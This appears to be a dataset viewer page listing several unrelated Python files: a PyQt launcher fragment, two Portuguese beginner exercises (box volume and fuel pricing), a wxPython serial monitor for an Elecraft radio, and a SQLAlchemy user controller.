        with open("./themes/{}.json".format(themename), "r") as f:
            self.__theme = json.loads(f.read())
''' END CLASS '''

if __name__ == '__main__':
    # Report the platform, force the Fusion style, build the window and
    # hand control to the Qt event loop.
    print(platform.system())
    app = QApplication(sys.argv)
    QApplication.setStyle(QStyleFactory.create('Fusion'))
    myGUI = CustomMainWindow()
    sys.exit(app.exec_())
|
# Exercise 7: read the length, width and height of a rectangular box
# (paralelepípedo), then compute and print its volume.
def paralelepipedo():
    """Prompt for the three dimensions and print their product."""
    try:
        comprimento = int(input("Digite o comprimento do paralelepípedo: "))
        largura = int(input("Digite a largura do paralelepípedo: "))
        altura = int(input("Digite a altura do paralelepípedo: "))
        print("Resultado: ", comprimento * largura * altura)
    except ValueError:
        # Any non-integer input aborts with a friendly message.
        print("Digite apenas números!")

paralelepipedo()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# monitorradio.py
import logging
import wx
import os, sys
from datetime import date
from time import ctime
from tombo.configfile import ConfigFile
from serialcommands import SerialCommands
#from tombo.timedstatusbar import TimedStatusBar
import elecraft
''' Responses from the MD; command:
Voice Modes: LSB = 1, USB = 2, AM = 5
CW Modes: CW = 3, CW-REV = 7
DATA Modes: DATA = 6, DATA-REV = 9
'''
# Maps a raw "MDn;" response string to [mode family, specific mode name],
# used to fill the first two status-bar fields in checkStatus.
modes = {
    'MD1;':['VOICE_MODE', 'LSB'],
    'MD2;':['VOICE_MODE', 'USB'],
    'MD5;':['VOICE_MODE', 'AM'],
    'MD3;':['CW_MODE', 'CW'],
    'MD7;':['CW_MODE', 'CW-REV'],
    'MD6;':['DATA_MODE', 'DATA'],
    'MD9;':['DATA_MODE', 'DATA-REV']
}
class MainWindow(wx.Frame):
    """ A frame that encloses a panel which encloses widgets. """

    def __init__(self, parent, title):
        """ Use the constructor to build the interface and show the window. """
        super(MainWindow, self).__init__(parent, title=title, size=(650, 400))
        self.gatherConfigInfo('serialcommandswx.conf')
        self.sc = SerialCommands(self.ports)
        self.InitUI()
        self.Centre()
        self.Show()

    def gatherConfigInfo(self, configfile):
        # Read serial-port definitions and the poll interval from the config
        # file, and arm the status-poll timer (started later in InitUI).
        config = ConfigFile(configfile)
        self.ports = config.getItems('Ports')
        self.poll_interval = config.getNumber('Misc', 'poll_interval')
        self.timer = wx.Timer(self)
        self.Bind(wx.EVT_TIMER, self.checkStatus, self.timer)

    def InitUI(self):
        """ Organizes building the interface. """
        # Top level panel - holds all other windows
        vbox1 = wx.BoxSizer(wx.VERTICAL)
        self.panel = wx.Panel(self)
        vbox1.Add(item=self.panel, proportion=1, flag=wx.ALL|wx.EXPAND)
        self.SetSizer(vbox1)
        vbox2 = wx.BoxSizer(wx.VERTICAL)
        self.panel.SetSizer(vbox2)
        vbox2.Add(item=self.buildLabelGrid(self.panel), flag=wx.CENTER|wx.TOP, border=40)
        self.buildStatusBar()
        self.timer.Start(self.poll_interval)

    def buildLabelGrid(self, owner):
        # 2x2 grid of static labels (currently fixed placeholder text).
        label_grid = wx.FlexGridSizer(rows=2, cols=2, hgap=3, vgap=10)
        label_grid.AddMany(self.buildLabels(owner))
        return label_grid

    def buildLabels(self, owner):
        # (widget, proportion) pairs consumed by FlexGridSizer.AddMany.
        return [
            (wx.StaticText(owner, id=wx.ID_ANY, label='Test Mode'), 0),
            (wx.StaticText(owner, id=wx.ID_ANY, label='On'), 0),
            (wx.StaticText(owner, id=wx.ID_ANY, label='VOX'), 0),
            (wx.StaticText(owner, id=wx.ID_ANY, label='On'), 0),
        ]

    def buildStatusBar(self):
        """ Build a lowly status bar. """
        # Three fields: mode family, specific mode, wall-clock time.
        self.statusbar = wx.StatusBar(self)
        self.statusbar.SetFieldsCount(3)
        self.SetStatusBar(self.statusbar)

    # Methods related to a button click
    def onQuit(self, event):
        # Release the serial ports before closing the frame.
        self.sc.closePorts()
        self.Close()

    def onButtonClick(self, event):
        # Dispatch from the widget ID to its configured command name.
        eventid = event.GetId()
        self.runCommand(self.widgetids[eventid])

    def runCommand(self, command):
        # NOTE(review): self.widgetids, self.command_sequences and
        # self.commands are never assigned in this file -- confirm they are
        # populated elsewhere before these handlers can fire.
        command_names = self.command_sequences[command].split('|')
        for command_name in command_names:
            command_list = self.commands[command_name].split('|')
            self.sc.runCommand(command_list)

    def checkStatus(self, event):
        # Timer callback: refresh the clock, read the rig's mode ("MD;") and
        # status ("IC;") over the serial port, and update the status bar.
        self.statusbar.SetStatusText(ctime(), 2)
        numeric_mode = self.sc.readPort(['COM13', 'MD;'])
        # NOTE(review): modes.get returns None for an unknown response, which
        # would raise on the subscripts below -- confirm responses are closed.
        mode_main_specific = modes.get(numeric_mode)
        self.statusbar.SetStatusText(mode_main_specific[0], 0)
        self.statusbar.SetStatusText(mode_main_specific[1], 1)
        response = self.sc.readPort(['COM13', 'IC;'])
        status = elecraft.listifyHexstring(response)
        print(status)
if __name__ == '__main__':
    # Route INFO-and-above records from the SERIALCOMMANDSWX logger to a
    # dedicated log file, then start the wx application.
    logger = logging.getLogger('SERIALCOMMANDSWX')
    logger.setLevel(logging.INFO)
    log_format = '%(asctime)s:%(lineno)s:%(levelname)s:%(name)s:%(message)s'
    formatter = logging.Formatter(log_format)
    file_handler = logging.FileHandler('serialcommandswx.log')
    file_handler.setFormatter(formatter)
    logger.addHandler(file_handler)
    app = wx.App()
    MainWindow(None, title='Monitor Radio')
    app.MainLoop()
|
# Fuel pump: price per litre and volume discount depend on the fuel type
# (A = alcohol, G = gasoline) and on whether more than 20 litres are bought.
tc = input('Informe (A) para Alcool ou (G) para Gasolina: ').upper()
ql = float(input('Informe a quantidade de litros: '))

if tc == 'A':
    valor, desc_baixo, desc_alto = 1.9, 3, 5
else:
    valor, desc_baixo, desc_alto = 2.5, 4, 6
desc = desc_baixo if ql <= 20 else desc_alto

# Apply the percentage discount to the gross price.
total = (valor * ql) * ((100 - desc) / 100.0)
print ('Total a pagar é %.2f' % total)
|
import os
from datetime import datetime
import pandas as pd
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from src.models.users import User
class UserController:
    """
    Provides functionality to retrieve and send user data from/to the database
    """

    @staticmethod
    def _make_session():
        """Build a SQLAlchemy session from the DATABASE_URL env variable."""
        # Shared by both public methods (was duplicated in each of them).
        conn_url = os.getenv("DATABASE_URL")
        engine = create_engine(conn_url, echo=True)
        session_maker = sessionmaker(bind=engine)
        return session_maker()

    @staticmethod
    def get_all_users():
        """
        Get all users in the database.

        :return: pandas.DataFrame with columns id, username, password,
                 last_trained_on, tbl_rating_user_id (one row per user)
        """
        session = UserController._make_session()
        try:
            users = session.query(User).all()
            return pd.DataFrame(
                [
                    [
                        user.id,
                        user.username,
                        user.password,
                        user.last_trained_on,
                        user.tbl_rating_user_id,
                    ]
                    for user in users
                ],
                columns=[
                    "id",
                    "username",
                    "password",
                    "last_trained_on",
                    "tbl_rating_user_id",
                ],
            )
        finally:
            # BUG FIX: the session (and its DB connection) was never released.
            session.close()

    @staticmethod
    def update_user_timestamp(users_without_ratings):
        """
        Update the last-training timestamp of every user that has ratings.

        :param users_without_ratings: iterable of usernames to skip
        :return: None
        """
        today = datetime.today()
        session = UserController._make_session()
        try:
            for user in session.query(User).all():
                # If a user has not rated before, we will not update the
                # timestamp for this specific user; we cannot just check
                # ratings here in case the user rated after training started.
                if user.username in users_without_ratings:
                    continue
                # update the last trained on flag to reflect the current time
                user.last_trained_on = today
                session.add(user)
            # Persist all timestamp updates in one transaction.
            session.commit()
        finally:
            # BUG FIX: close the session even when the commit fails.
            session.close()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.